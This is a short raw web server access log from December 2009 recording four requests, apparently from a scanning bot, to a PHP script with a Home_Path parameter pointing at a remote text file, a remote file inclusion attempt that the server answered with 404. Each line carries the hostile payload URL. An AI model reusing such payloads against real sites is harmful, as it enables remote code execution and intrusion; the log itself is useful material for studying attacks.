121.125.67.213 - - [16/Dec/2009:03:05:03 -0600] "GET /logs/access_log.1248134400/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:03 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:20 -0600] "GET /enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.125.67.213 - - [16/Dec/2009:03:05:20 -0600] "GET /logs/access_log.1247097600/enc/content.php?Home_Path=http://khuplaza.com/khuplaza/bbs/icon/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
